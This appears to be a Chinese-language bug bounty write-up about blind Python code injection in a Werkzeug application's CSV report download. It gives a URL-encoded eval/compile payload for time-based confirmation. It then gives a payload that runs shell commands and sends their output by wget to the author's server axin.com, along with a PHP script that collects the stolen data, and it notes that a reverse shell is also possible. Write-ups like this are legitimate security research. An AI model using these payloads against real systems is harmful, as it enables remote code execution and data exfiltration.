本漏洞由@Sh4dow供稿,🐂就完事儿了
简单记录一下这个漏洞,没啥特殊的手法,就是细心与fuzz🤔
目标应用有一个下载文件的功能,你可以以csv格式下载报告
抓包结果如下:
看起来好像没啥问题,但是响应中的Werkzaug与python吸引了我的注意,不了解Werkzaug的可以去看一下
我尝试着用一些其他的payload替换了params参数的值,都是报错,看起来真就没啥问题,我都准备不看这个点了,但是,当我用空参数的时候,服务器返回了500错误
这说明这个参数还是会影响服务器的运行的嘛(当然也不一定,这里只是我的一个猜测),为了进一步确定,我开始fuzz这个参数
最后把各种报错整理了一下,发现所有和python相关的payload都报了500错误😀
看起来有戏,于是把python rce的payload进行了一下url编码,
eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29
成功执行,服务器产生了延时:
由于数据不会回显,我们就只有用其他手法来外带数据了,还记得上一篇文章的内容吗?
没有看上一篇文章的快回头去瞅瞅😉
构造payload:
eval(compile("""for x in range(1):\n import os\n os.popen(r'wget http://axin.com:8000/shell.php?cmd="$(ls -la)”)read()”””,’’,’single’))
然后在我们的服务器axin.com上部署一份shell.php文件,文件内容如下:
<?php
$a = fopen('POC.txt', 'a');
fwrite($a, $_GET["cmd"]);
fclose($a);
?>
发送payload,并查看POC.txt文件的内容:
nice的不得了,当然,也可以直接弹shell
847
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
